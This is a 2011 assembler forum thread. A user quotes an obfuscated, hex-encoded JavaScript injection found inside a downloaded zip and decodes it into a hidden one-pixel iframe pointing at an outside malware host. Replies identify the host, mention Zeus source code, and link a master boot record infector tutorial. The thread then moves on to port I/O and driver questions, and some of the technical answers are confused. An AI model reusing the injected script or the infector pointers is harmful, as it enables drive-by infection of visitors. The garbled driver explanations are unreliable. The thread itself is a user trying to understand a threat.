flat assembler
Message board for the users of flat assembler.

Index > Heap > js.iframe - winasm.net dlg2fasm

Author
Thread Post new topic Reply to topic
yoshimitsu



Joined: 07 Jul 2011
Posts: 96
yoshimitsu
Hi,
so I downloaded dlg2fasm.zip some weeks ago from winasm.net and nod32 just threw some message about it why I uploaded it on vt:
http://www.virustotal.com/file-scan/report.html?id=787097dada05424612d4c47a42024d3dd2c249187b0950a4c9acf9bee353f0ce-1312518265

Before the actual zip-package the file contains this:
Quote:
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f696e6e65737370686f746f2e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2259</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2261</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2263</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2265</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/winasm/public_html/index.php:1) in <b>/home/winasm/public_html/mkportal/modules/downloads/index.php</b> on line <b>2267</b><br />

which is hexdecoded:
Quote:
document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')


As I'm neither that familiar with javascript, nor security I'm wondering if this could be anyhow harmful,
1. can this even be executed in a zip package?..
2. is this even harmful at all, I mean I just tried to visit that URL, could something happen, isn't it just some webpage?

May sound kind of naive but atm I have tons of stuff on my hd without backups so I guessed it'd be better to ask..
Post 05 Aug 2011, 04:56
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
xss is what they were trying to do. that's a session hijacking technique right there. but i wonder why it's encrypted and in a zip file. whatever they were trying to accomplish, they did not want you to see it.
Post 05 Aug 2011, 06:20
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
i think.
Post 05 Aug 2011, 06:21
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
look, http://www.malwareurl.com/listing.php?domain=innessphoto.com it's zeus botnet exploit page or something like that.
Post 05 Aug 2011, 12:57
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
hehehe i know who wrote ZEUS. i have it's source code too.....

it's bad news.

good find dude.

@Overflowz so all those encryption stuff you were building a crypter/binder for your zeus? Laughing
Post 05 Aug 2011, 13:21
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
@typedef
No way, I'm not "malware user". I just gave information about that site. I'm going to be security professional so, don't blame things like that to me.
I know who wrote zeus too and have source code also, to understand it's actions and security things what it does. Malwares are best way to study, they give new and new different ideas and of course I'm learning much from it.
Post 05 Aug 2011, 17:03
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
well i am.
yesterday i made a boot infector on my pc and i had to boot from XP Disk lol.......
Post 05 Aug 2011, 19:32
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
boot infector from Ring3 ? WHAT ?! or you mean device driver ?
I need some lessons about drivers.. I can't learn C !
Post 06 Aug 2011, 00:09
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
Overflowz wrote:
boot infector from Ring3 ? WHAT ?! or you mean device driver ?


https://opensc.ws/tutorials-articles/15922-windows-master-boot-record-infector-corruptor.html#post139319

Overflowz wrote:
I need some lessons about drivers.. I can't learn C !

That would mean converting WinDDK header files to ASM.INC files which I don't think could ever happen and would be twice plus 10 times harder than just learning C. Very Happy
Post 06 Aug 2011, 04:24
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
typedef
sigh.. Windows gives you access to MBR from ring3 ? EH ?!
Post 06 Aug 2011, 12:20
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
yep. and i have the power to replace the bootstrap code with my own. hold on i'll show you the dump from first byte 'jmp 0000:7c54' to last word '0xaa55'
Post 06 Aug 2011, 14:43
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
I know how to read MBR. I have written program for dumping MBR but I didn't though if windows could access it for writing.. kewl strange.
Post 06 Aug 2011, 15:44
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
if window 7 doesn't let you, you can add a manifest file to give it your "loyalness".
Post 06 Aug 2011, 16:03
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
I don't want to destroy MBR.. It's useless. Anyway, I'm going to learn kernel mode assembly from OSDev right now.
edit:
Can I write drivers with interrupts ? For example:
Code:
format PE native dll 4.0
include 'win32a.inc'
entry driverentry
section '.data' data readable writeable notpageable
something db "hai world","$"
section '.text' code readable executable notpageable
driverentry:
mov ah,09
mov dx,something
int 0x21
...    

I really don't understand what IN and OUT does and how finds ports sending signals or something.. It's hard Sad I need full disclosure about it.
Post 06 Aug 2011, 16:07
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
how to read date from cmos.
Code:
mov dx,70h
mov al,7
out dx,al
inc dx
in al,dx
ret    

al = today's date. ie for me it's 6
Post 06 Aug 2011, 17:25
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
typedef
I know how IN and OUT instructions look like but I don't know what they does. And also, why "mov dx,70h" to get current date ? I'm asking for that, where should I get ports and how to control them ? I need full information about that.
Post 06 Aug 2011, 19:17
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
Post 06 Aug 2011, 22:28
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
still, I don't get it. How can I, for example create file on disk with drivers ? I don't have any idea how to do it when working only with ports like IN and OUT.. or maybe HDD has it's own programming or something like that?
Post 06 Aug 2011, 23:59
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
Overflowz wrote:
still, I don't get it. How can I, for example create file on disk with drivers ? I don't have any idea how to do it when working only with ports like IN and OUT.. or maybe HDD has it's own programming or something like that?


Your driver is running in real mode.

Your p-mode program tells your driver to create a file or in general write a block of data to a specific data block on the drive.( ie using int 80h )
Your R-mode driver then looks up your File Table structure for that file (ie. which cluster it is located on or is there such a file)

and so on...

Get it ?

When you copy a file to another drive and then the OS says there's no space, the space is there it's just that the OS doesn't want you to overwrite the other files' data. That's why in some cases you can recover deleted files by reading the Master File Table($MFT) and the like because the data is still there but marked not needed.

It's complicated man.
Post 07 Aug 2011, 00:29
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz
Sounds really mysterious Smile I must learn more about these things! I'm going to find some teacher here if I'll have luck because believe or not, in my country nobody are even interested in assembly language and I don't have to say things like this, what interrupts is and so on)) Thanks for info anyway. Smile
Post 07 Aug 2011, 01:29
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar.

Powered by rwasa.